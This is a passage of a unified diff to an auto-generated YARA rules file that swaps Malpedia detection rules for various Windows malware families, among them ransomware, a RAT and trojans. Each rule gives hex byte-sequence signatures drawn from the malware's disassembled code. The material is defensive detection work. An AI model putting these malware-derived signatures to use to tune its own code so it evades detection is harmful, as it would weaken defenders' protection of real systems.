+		id = "233d17b2-2f85-5e81-980e-94af1bd07bc8"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lockergoga"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lockergoga_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hawkball_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "679ed446af7bd76c538308594efebe8a71cc5f0a66dc5648e19b704e8ba83810"
+		logic_hash = "9b3366bae76271a5cf9e32b5f0daa7b3fc0e06cb94c8f54801829ffbaa6e0521"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86598,32 +86631,32 @@ rule MALPEDIA_Win_Lockergoga_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 83c718 83c618 897dec 3bf3 75eb 8bc7 }
-		$sequence_1 = { 84c0 7405 8b7608 eb4e 8b8564ffffff 80780d00 743a }
-		$sequence_2 = { c645fc1b e8???????? 8d4db4 c645fc0e e8???????? 8b4d9c 8b06 }
-		$sequence_3 = { 56 83c0c8 50 e8???????? 837d9000 c745a800000000 0f8691000000 }
-		$sequence_4 = { 57 8d4d9c e8???????? 8b7da0 8b45cc c645fc0b }
-		$sequence_5 = { 8365ec00 ff75ec e8???????? 59 0fb6c0 85c0 7408 }
-		$sequence_6 = { 51 50 e8???????? 8b45ec 83c408 c7461000000000 c746140f000000 }
-		$sequence_7 = { 895108 50 8bce e8???????? 8b560c 8d4508 50 }
-		$sequence_8 = { 6a08 8975ec c7450800000000 c70600000000 c7460400000000 c7460800000000 c7460c00000000 }
-		$sequence_9 = { 8b4da0 c6400100 8808 e9???????? b8ffffff7f 2bc1 83f801 }
+		$sequence_0 = { ff15???????? 50 53 6a00 68e9fd0000 }
+		$sequence_1 = { c3 6a59 ff15???????? 85c0 0f84b4000000 be???????? 8bc6 }
+		$sequence_2 = { 56 8b7508 833e00 7f0a be04000000 e9???????? }
+		$sequence_3 = { ff75f8 c745fc00000000 ffd6 8b45fc 8b1d???????? 40 50 }
+		$sequence_4 = { 56 f30f7f4588 57 660f6f05???????? 8b3d???????? f30f7f4598 }
+		$sequence_5 = { 50 668945dc 0f57c0 668985acf7ffff 8d85aef7ffff 50 c745d801000000 }
+		$sequence_6 = { ff15???????? 8b4309 83f801 751c 8b5508 8d85f8fdffff 50 }
+		$sequence_7 = { 85c0 741e 8d85fcfeffff 68???????? 50 e8???????? }
+		$sequence_8 = { ffd6 50 ffd3 ff0d???????? 33c0 5f }
+		$sequence_9 = { 6a08 ffd3 50 ff15???????? 8bf0 8d8578ffffff 50 }
 
 	condition:
-		7 of them and filesize < 2588672
+		7 of them and filesize < 229376
 }
-rule MALPEDIA_Win_Medusa_Auto : FILE
+rule MALPEDIA_Win_Miuref_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d20a8f8a-0c40-56df-b905-5b8d6ebe61b2"
+		id = "1b96c0a2-4f7f-5dba-b4cc-c39446b366ca"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.medusa"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.medusa_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miuref"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miuref_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "bf22f346b79f830cfb557e80bea02849fba4fc00ac522de893ed484b5992cd17"
+		logic_hash = "9f0c33a604555481ceaef6b71f9838cb9fae83fec546a9a4bdc6479d8cf9ac8a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86637,32 +86670,32 @@ rule MALPEDIA_Win_Medusa_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e1fb 1cc9 3ca5 2c8e a1???????? d528 }
-		$sequence_1 = { ff7100 52 ff7200 53 ff7300 54 }
-		$sequence_2 = { 6a00 4b ff6b00 4c ff6c004d ff6d00 4e }
-		$sequence_3 = { 0050ff 7000 51 ff7100 }
-		$sequence_4 = { 53 ff7300 54 ff740055 ff7500 56 }
-		$sequence_5 = { 8b4c6386 8608 5f e1fb 1cc9 3ca5 2c8e }
-		$sequence_6 = { 0c48 b5f9 43 324dd5 1ddf859f31 }
-		$sequence_7 = { 0000 aa 05854cffab 004893 }
-		$sequence_8 = { 05854cffab 004893 3eb35b 813bf80937dc 8b4c6386 }
-		$sequence_9 = { 1cc9 3ca5 2c8e a1???????? d528 32f4 }
+		$sequence_0 = { 8b750c 81fe00020000 7204 33c0 eb73 53 bb00200000 }
+		$sequence_1 = { e8???????? 59 b9???????? 3b01 7445 83c104 81f9???????? }
+		$sequence_2 = { 50 ff742418 e8???????? ff742420 8bf0 56 e8???????? }
+		$sequence_3 = { 8d45a8 83ec58 50 e8???????? ff7510 8d45a8 ff750c }
+		$sequence_4 = { 8d45cc 50 ff15???????? 8b45fc 8b08 50 ff9180000000 }
+		$sequence_5 = { e8???????? ff75f4 e8???????? 8b45e8 83c418 }
+		$sequence_6 = { 7704 50 51 eb27 837d1400 750c 57 }
+		$sequence_7 = { 3bc3 7320 894508 8b450c 8b4d08 8d4c08c1 56 }
+		$sequence_8 = { e8???????? 59 6a00 8bf0 8d45fc 50 57 }
+		$sequence_9 = { e8???????? 53 e8???????? 33f6 56 e8???????? }
 
 	condition:
-		7 of them and filesize < 1720320
+		7 of them and filesize < 180224
 }
-rule MALPEDIA_Win_Mocton_Auto : FILE
+rule MALPEDIA_Win_Ncctrojan_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f4f983b-9c6b-508d-9490-50b17ee1d0df"
+		id = "621539aa-975e-51db-993a-fe0f56fb0b46"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mocton"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mocton_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ncctrojan"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ncctrojan_auto.yar#L1-L164"
 		license_url = "N/A"
-		logic_hash = "16b135f602d0bf1d0d71eee14e2cd809b4b69481edc54d1e4a70e6527694874b"
+		logic_hash = "1a1a856a6ccef6fe3d5ce45ce3caa49b1b9096f7072cb08e6fd3fa9a04b80075"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86676,32 +86709,38 @@ rule MALPEDIA_Win_Mocton_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b4d10 e8???????? 8985e4e8ffff 8b85e4e8ffff 2b45a4 3b45dc 7202 }
-		$sequence_1 = { 83e801 8945d4 8b4dd4 0faf4de8 8b55e4 c1fa05 69d271460389 }
-		$sequence_2 = { 8b9524fcffff 69d2a44539db 33c0 81fa35ac0e36 0f9cc0 355ba30c98 7461 }
-		$sequence_3 = { 2b45e4 33c9 3d6b76f951 0f9dc1 33d1 742c 8b55e4 }
-		$sequence_4 = { 8b95c8e9ffff 83c201 8995c8e9ffff eb4e 8b85c0e9ffff 83e801 8985c0e9ffff }
-		$sequence_5 = { 83c104 894df8 8b55f8 3b55cc 0f8475060000 c745ac5aee3273 8b45ac }
-		$sequence_6 = { c745c842fc81f2 c7459cea0bbd91 c745b0238aa931 8b55c8 c1fa03 0faf55b0 b886628d96 }
-		$sequence_7 = { 898d70feffff 8b9570feffff 81c28029ab41 33c0 399570feffff 0f9dc0 338570feffff }
-		$sequence_8 = { 0355e4 8b45e4 d1f8 33c9 3b45e4 0f9ec1 33ca }
-		$sequence_9 = { 33d2 3b8d8cfdffff 0f9cc2 81e2d70a7b03 81f21da6f69d 7419 8b854cfdffff }
+		$sequence_0 = { 83f805 7536 8b85e8feffff 85c0 750a }
+		$sequence_1 = { 68???????? e9???????? 83f801 750a 68???????? }
+		$sequence_2 = { 750a 68???????? e9???????? 83f802 }
+		$sequence_3 = { d1f9 8d4101 50 e8???????? 8b542410 83c404 8bca }
+		$sequence_4 = { 50 e8???????? 8d45f4 50 8d85e8adffff }
+		$sequence_5 = { c785ccbdffff00000000 668985dcbdffff 8d85ecfdffff 8985d4bdffff }
+		$sequence_6 = { 85d2 0f8407010000 83faff 0f84fe000000 33c0 85d2 }
+		$sequence_7 = { e8???????? 68???????? 6a20 68???????? e8???????? 83c418 e8???????? }
+		$sequence_8 = { 0f99c0 8d044501000000 5e 5d c3 3b0d???????? }
+		$sequence_9 = { 03c1 50 51 ff7304 }
+		$sequence_10 = { 837dec08 8d45d8 0f4345d8 83ec18 }
+		$sequence_11 = { 8965f0 6a01 8945ec 40 6a00 }
+		$sequence_12 = { 7e6f 8945c8 8b400c 8b7004 }
+		$sequence_13 = { 0f437d08 ff15???????? 50 56 }
+		$sequence_14 = { 50 51 8d4d08 e8???????? 56 8985c8feffff 8d4d08 }
+		$sequence_15 = { 02c9 2480 7403 80f11b 83ea01 }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 1160192
 }
-rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
+rule MALPEDIA_Win_Badhatch_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a43d5074-419f-56bf-9041-ecb4085c5c0f"
+		id = "d1d3a6d7-0b13-5342-b91c-01db9308bc68"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nexster_bot"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nexster_bot_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badhatch"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badhatch_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "030c2bb9e4dedc4e668df50b31810c5f051c7ed3a34092c75978caae787f72df"
+		logic_hash = "2f3c78bf8e633b7d8699c41a378230a8ee0e51bf5f6dea1277813531be01c065"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86715,34 +86754,34 @@ rule MALPEDIA_Win_Nexster_Bot_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a4701 47 84c0 75f8 8b0d???????? 8d84240c010000 }
-		$sequence_1 = { 6a00 8908 668b0d???????? 6a00 895004 68000000c0 }
-		$sequence_2 = { 42 3acb 75f6 8dbd00080000 8db5000c0000 e8???????? }
-		$sequence_3 = { e8???????? 8b54241c 68???????? 8bf0 52 8d44241c 50 }
-		$sequence_4 = { 33c0 8da42400000000 8a1485d0604100 889405000e0000 40 83f80b }
-		$sequence_5 = { 8d842480000000 50 ff15???????? 8b3d???????? }
-		$sequence_6 = { 8d0cbd20804100 8901 8305????????20 8b11 81c200080000 }
-		$sequence_7 = { 85c0 0f8581000000 80bc24ae01000001 7533 8b0d???????? 8b15???????? }
-		$sequence_8 = { 84c0 75f6 8d85c0140000 48 }
-		$sequence_9 = { 75f9 8b1424 6a00 2bc1 8d4c242c }
+		$sequence_0 = { ff15???????? 8b3d???????? 85c0 7512 ffd7 53 }
+		$sequence_1 = { 83c420 5f 5e 83c574 c9 c3 55 }
+		$sequence_2 = { 837df800 7435 837f0c00 742f 33c0 e9???????? 8b4f08 }
+		$sequence_3 = { 7cb9 eb09 ff15???????? 8945fc 8b45fc 5f 5e }
+		$sequence_4 = { 53 ff750c 8d443750 50 e8???????? 83c40c ff750c }
+		$sequence_5 = { ffd6 8d45e8 50 68???????? ff7508 e8???????? }
+		$sequence_6 = { 7559 ff15???????? 3dea000000 754c ff75fc 56 ff35???????? }
+		$sequence_7 = { 03d0 03d1 52 50 e8???????? 83c40c b8ea000000 }
+		$sequence_8 = { 838b40010000ff 33f6 56 56 6a01 56 }
+		$sequence_9 = { eb05 8b450c 8938 395dfc 740e 57 53 }
 
 	condition:
-		7 of them and filesize < 245760
+		7 of them and filesize < 156672
 }
-rule MALPEDIA_Win_Fonix_Auto : FILE
+rule MALPEDIA_Win_Polyglot_Ransom_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "830a78fe-5e83-5a5d-85e3-7068b4a16c64"
+		id = "bf3c0440-2d73-51e5-9d4d-22d8d3fb589d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.fonix_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.polyglot_ransom_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "f38caf2a92a21c38ad3b20bd93c5f2960092d1cc56de1072c080f008b7483511"
+		logic_hash = "5cf22f105101e70a8b28d9346158b196300696ba529297d761e1115a7c957230"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86754,32 +86793,32 @@ rule MALPEDIA_Win_Fonix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { a801 8b04d560b74900 8b14d564b74900 7506 83c002 83ea02 5d }
-		$sequence_1 = { 59 59 8b471c 89461c 8bc6 5f }
-		$sequence_2 = { c645fc18 8d4dc4 8bd0 c70424???????? e8???????? 59 8d8d44fcffff }
-		$sequence_3 = { 8b16 50 ff5220 e9???????? e8???????? 8b75ac 83c404 }
-		$sequence_4 = { 8985a0f8ffff 0f85c5fcffff 8b8d8cf8ffff 85c9 0f84d3000000 8b048d2cdc4900 89858cf8ffff }
-		$sequence_5 = { 50 8d8de0feffff e8???????? 8d8dc8feffff e8???????? 8d8db0feffff e8???????? }
-		$sequence_6 = { 50 c745fc01000000 ff5248 ffb578ffffff 8d4e4c e8???????? ff7620 }
-		$sequence_7 = { 83e3fe e8???????? 807d6700 0f8413010000 6a01 8d4dac e8???????? }
-		$sequence_8 = { 8b45fc 0580000000 c5fe7f00 c5fe6f8560feffff c4e37d46458031 c5fe7f8580e5ffff c5fe6f8580e5ffff }
-		$sequence_9 = { 0f849c050000 6a01 8d8d50020000 e8???????? 6a01 8d4d8c c645fc0c }
+		$sequence_0 = { 207370 65676e 657265 2064656c 20636f 6d 7075 }
+		$sequence_1 = { 6a05 68f3000000 8d45e4 68???????? 50 e8???????? 83c434 }
+		$sequence_2 = { 8d8508faffff 68???????? 50 e8???????? 8d8508f2ffff 50 8d8508faffff }
+		$sequence_3 = { 740a c783ac00000007000000 39bb1c010100 7708 39bb18010100 7666 39bb20010100 }
+		$sequence_4 = { 8365e800 8365ec00 837dfc00 7522 837d0800 740e 8b7d08 }
+		$sequence_5 = { 50 8d8538d9ffff 50 e8???????? 8bc3 50 8d8538d9ffff }
+		$sequence_6 = { e8???????? 8d4564 50 8d45ec 50 e8???????? }
+		$sequence_7 = { 7970 7428 293b 223e 44 657363 69667261723c2f }
+		$sequence_8 = { 807b1d00 8d45e8 50 7445 ff7308 8365e800 680a202600 }
+		$sequence_9 = { c3 85f6 7504 6a9a 58 c3 8b8608010000 }
 
 	condition:
-		7 of them and filesize < 2226176
+		7 of them and filesize < 1392640
 }
-rule MALPEDIA_Win_Ice_Ix_Auto : FILE
+rule MALPEDIA_Win_Wipbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "923bfba5-fc64-5bcc-9e18-fd2e69647e54"
+		id = "9a0970f9-ec33-54d5-ae53-9537a083afd7"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_ix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_ix_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wipbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wipbot_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "88c417db4270d272cced0c61349b1fd36aad8c36a3945176ae9dc99a2eba0afc"
+		logic_hash = "fb932c7b46d7c186e09cb261140c60f0fb4b0c9205bd0105a6b5687477b202b2"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86793,32 +86832,32 @@ rule MALPEDIA_Win_Ice_Ix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 56 6a47 8945f0 }
-		$sequence_1 = { 8db508ffffff 58 e8???????? 6a63 8d7598 58 e8???????? }
-		$sequence_2 = { 6a08 6a00 8d45f4 50 e8???????? 8db5d8feffff b89b000000 }
-		$sequence_3 = { 6a2d 58 e8???????? ff75d0 ff15???????? }
-		$sequence_4 = { 85ff 0f8403020000 8a1408 80fa0d }
-		$sequence_5 = { 833d????????04 8b7c2414 1bc0 f7d8 68cc000000 83c034 e8???????? }
-		$sequence_6 = { 6a3f 8d75b8 58 e8???????? 8b4df4 8bc6 50 }
-		$sequence_7 = { c20400 55 8bec 83ec20 56 6a5c }
-		$sequence_8 = { 741d 48 7416 83e80b 740d 83e805 7404 }
-		$sequence_9 = { 57 ff15???????? 8b4640 3bc3 0f84a8000000 6800000010 68254e0000 }
+		$sequence_0 = { 48 89cb 48 89d6 b98855514f ba4656f1f6 e8???????? }
+		$sequence_1 = { c744241400000000 c744241800000000 8974240c 89542410 c74424080a000000 890424 }
+		$sequence_2 = { 48 01cb 66813b9090 0f8404040000 bace2cfb69 b98855514f }
+		$sequence_3 = { 85c0 48 8907 74a0 48 83c708 48 }
+		$sequence_4 = { c744240400000000 893424 89442408 ffd7 }
+		$sequence_5 = { ba2e9fd298 b98855514f e8???????? 49 }
+		$sequence_6 = { 89e5 e8???????? 85c0 7405 8b4034 eb02 }
+		$sequence_7 = { 41 b901000000 ba01000000 4c 8d442468 48 8d4c246c }
+		$sequence_8 = { 740d 8b45f4 e8???????? e9???????? 89d8 e8???????? 85c0 }
+		$sequence_9 = { 48 8b442428 eb02 31c0 48 }
 
 	condition:
-		7 of them and filesize < 327680
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Navrat_Auto : FILE
+rule MALPEDIA_Win_Kikothac_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0af75ae7-7ace-560b-b2d7-c19b71f71863"
+		id = "3a1785b6-f597-5e86-8c4e-a3c4c36845cf"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.navrat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.navrat_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kikothac"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kikothac_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "ae93408812c109848736690d96b263c956c354ad0be060f7ff964bd9ca44b655"
+		logic_hash = "783b1a1a8c3b3dc323ec01428cfa46b90f3abf925fa4bb401d1a6455aac8c5f6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86832,34 +86871,34 @@ rule MALPEDIA_Win_Navrat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1e610 0bf0 56 e8???????? }
-		$sequence_1 = { 7707 0fbec0 83e847 c3 8d48d0 80f909 }
-		$sequence_2 = { 1bf6 f7de 56 68???????? e8???????? }
-		$sequence_3 = { 8d48bf 80f919 7707 0fbec0 83e841 }
-		$sequence_4 = { 8d85a4feffff 50 6801000080 ff15???????? }
-		$sequence_5 = { 56 50 57 a3???????? ff15???????? 57 ff15???????? }
-		$sequence_6 = { 0fbec0 83e847 c3 8d48d0 80f909 7707 }
-		$sequence_7 = { 7503 884702 85f6 7407 8b7608 }
-		$sequence_8 = { fec8 2440 fec8 c3 }
-		$sequence_9 = { 884702 85f6 7407 8b7608 }
+		$sequence_0 = { 668945de e8???????? 83f8ff 0f84c2000000 803d????????00 }
+		$sequence_1 = { 80ce63 3485 80f601 041b 660fbdd0 }
+		$sequence_2 = { 8b140e 52 8d5dfc e8???????? 83c404 84c0 7509 }
+		$sequence_3 = { 57 8bc2 c1f805 8b0485c0514100 8bfa 83e71f }
+		$sequence_4 = { 660fbae309 8a46ff c1da07 f6c3a7 28d8 51 }
+		$sequence_5 = { 5b 8b7708 8b7f04 84c0 751a e8???????? 84c0 }
+		$sequence_6 = { f5 f6d8 9c 28c3 f9 }
+		$sequence_7 = { 8b4df4 03c2 668b55f8 8908 8a4dfa 66895004 884806 }
+		$sequence_8 = { c64424080e 50 38c6 98 }
+		$sequence_9 = { 660fb6f3 8db30307ad85 c744244800000000 8db7ec8bddf1 8b742474 9c ff3424 }
 
 	condition:
-		7 of them and filesize < 352256
+		7 of them and filesize < 581632
 }
-rule MALPEDIA_Win_Kimsuky_Auto : FILE
+rule MALPEDIA_Win_Deputy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2b35147a-6567-5a82-9763-3c4ee63e8bd0"
+		id = "5f636daa-92f3-5297-9096-cf07f3905b0c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kimsuky"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kimsuky_auto.yar#L1-L287"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deputy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deputy_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "8be5626e2aa4b8842ccf79ecee20f7ed9aeff1f3bf60d56bf491e7076e9910d9"
+		logic_hash = "ca97585f0db258f9fdf08cb077c29b43b172f7ef4964d85d883e4007934393d7"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -86871,53 +86910,32 @@ rule MALPEDIA_Win_Kimsuky_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d85f8feffff 6804010000 50 e8???????? 8d85f0fcffff }
-		$sequence_1 = { ffd7 a3???????? 8d85ecfbffff 50 53 ffd7 }
-		$sequence_2 = { 6a00 6800f70484 6a00 6a00 68???????? 8d85e4fbffff 50 }
-		$sequence_3 = { ff15???????? 3db7000000 7503 56 eb18 6a00 }
-		$sequence_4 = { 8d95f0fcffff b9???????? e8???????? 8d95ecfbffff b9???????? }
-		$sequence_5 = { ff15???????? 8d85ecfbffff 50 8d85f8feffff 50 8d85f4fdffff 68???????? }
-		$sequence_6 = { e8???????? 83c418 8d85f8feffff 6a00 50 ff15???????? 8d85ecfbffff }
-		$sequence_7 = { ff15???????? 85c0 7516 ff15???????? 8bd8 e8???????? }
-		$sequence_8 = { ffd7 a3???????? 8d85d4f5ffff 50 }
-		$sequence_9 = { 8b4520 4883c514 85c0 0f857affffff 4c8b7c2460 4c8b6c2420 4c8b642428 }
-		$sequence_10 = { 4156 4157 4883ec40 48896c2470 }
-		$sequence_11 = { 48896c2460 488b4818 41bb01000000 4c8b7120 4d85f6 }
-		$sequence_12 = { 33d2 4883c9ff 4903de ff542468 4533c0 498bce }
-		$sequence_13 = { 488b6c2460 4c637d3c 33c9 41b800300000 4c03fd 448d4940 }
-		$sequence_14 = { 48896c2470 4889742438 4533ff 4c89642428 4c896c2420 33f6 }
-		$sequence_15 = { 7405 48ffcd ebdb 65488b042560000000 48897c2430 48896c2460 }
-		$sequence_16 = { 85c9 0f8494020000 89bda0000000 897d30 }
-		$sequence_17 = { 89442450 8bf0 8bc8 e8???????? }
-		$sequence_18 = { 85c0 0f84b3000000 85f6 0f8497000000 }
-		$sequence_19 = { 85c0 0f84e6000000 c6850801000000 33c0 }
-		$sequence_20 = { 4c89642430 c744242880000000 c744242002000000 4533c9 4533c0 ba00000040 }
-		$sequence_21 = { 8bcf 85c0 0f94c1 85c9 }
-		$sequence_22 = { 488d8a38000000 e9???????? 488d8a28010000 e9???????? }
-		$sequence_23 = { 895c2458 eb04 8b5c2458 c685700d000000 33d2 }
-		$sequence_24 = { 8bd7 3bd8 0f94c2 85d2 7419 }
-		$sequence_25 = { 488d95003e0000 488bc8 e8???????? 90 }
-		$sequence_26 = { 488d9510010000 488d4dc0 e8???????? 90 }
-		$sequence_27 = { 488d9510010000 498bce ff15???????? 498bce }
-		$sequence_28 = { 488d9500010000 4883bd1801000008 480f439500010000 4c8d05c2850500 }
-		$sequence_29 = { 488d9424c0000000 4883bc24d800000008 480f439424c0000000 48895c2438 c744243000f70484 48895c2428 }
-		$sequence_30 = { 488d9508010000 488d4c2440 e8???????? 90 488b542458 }
+		$sequence_0 = { 57 6808020000 50 8d85e4f9ffff 50 e8???????? 83c40c }
+		$sequence_1 = { 58 6bc000 c780ac40001002000000 6a04 }
+		$sequence_2 = { 8d0436 50 6a00 57 8985ccf9ffff e8???????? }
+		$sequence_3 = { ff15???????? eb6c 56 57 }
+		$sequence_4 = { 50 ff510c 85c0 0f85b0030000 }
+		$sequence_5 = { 8d85d0f9ffff 50 68???????? 68???????? ff15???????? 85c0 }
+		$sequence_6 = { 59 c3 e8???????? 85c0 0f843f070000 }
+		$sequence_7 = { 0f1005???????? 66a1???????? 2bca d1f9 0f11844df4fdffff 6689844d04feffff 85db }
+		$sequence_8 = { e8???????? 83c40c 8d85ecfbffff 6804010000 50 ff35???????? }
+		$sequence_9 = { ffb5c8f9ffff 8bd8 8d85e0f9ffff ffb5ccf9ffff 56 53 50 }
 
 	condition:
-		7 of them and filesize < 1021952
+		7 of them and filesize < 51200
 }
-rule MALPEDIA_Win_Grillmark_Auto : FILE
+rule MALPEDIA_Win_Bit_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "94d64c09-2c69-5952-977d-9716f3cb3003"
+		id = "f95bf2c0-1a3f-5ba6-86c1-dc6657e9fb49"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.grillmark_auto.yar#L1-L127"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bit_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bit_rat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c6ddc22f686e3bfc93b0245e1ab65f2459e27d4cb969cb323a24bb3baf4cbe5c"
+		logic_hash = "6a75a2a36ee1576648e5cd3e08166671639be750c77ff100be6cd8e32ca1f573"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -86931,32 +86949,32 @@ rule MALPEDIA_Win_Grillmark_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 8d4df4 56 51 53 50 57 }
-		$sequence_1 = { 6800000080 ff7510 ff15???????? 8bf8 83ffff 7436 53 }
-		$sequence_2 = { f3ab 66ab aa 8d458c 895df8 50 895df4 }
-		$sequence_3 = { 83ffff 7504 33c0 eb1a }
-		$sequence_4 = { 66a5 a4 5f 33c0 3905???????? 5e 50 }
-		$sequence_5 = { 57 e8???????? 8d85f4fcffff 50 57 }
-		$sequence_6 = { ff15???????? 6a40 33c0 59 8dbdfdfeffff 889dfcfeffff 53 }
-		$sequence_7 = { 66ab aa 8d85fcfeffff 50 6804010000 e8???????? }
-		$sequence_8 = { 50 57 ffb604010000 56 e8???????? 83c410 85c0 }
-		$sequence_9 = { 6a01 ff7508 e8???????? 56 e8???????? ff75f4 }
+		$sequence_0 = { eb1b 8b4de0 8b5ddc 8b7df8 8b45f4 eba7 8b4510 }
+		$sequence_1 = { e8???????? 8b4f0c 83c404 3b01 740e 6a00 6a00 }
+		$sequence_2 = { e8???????? c645fc42 50 8bce e8???????? c645fc24 53 }
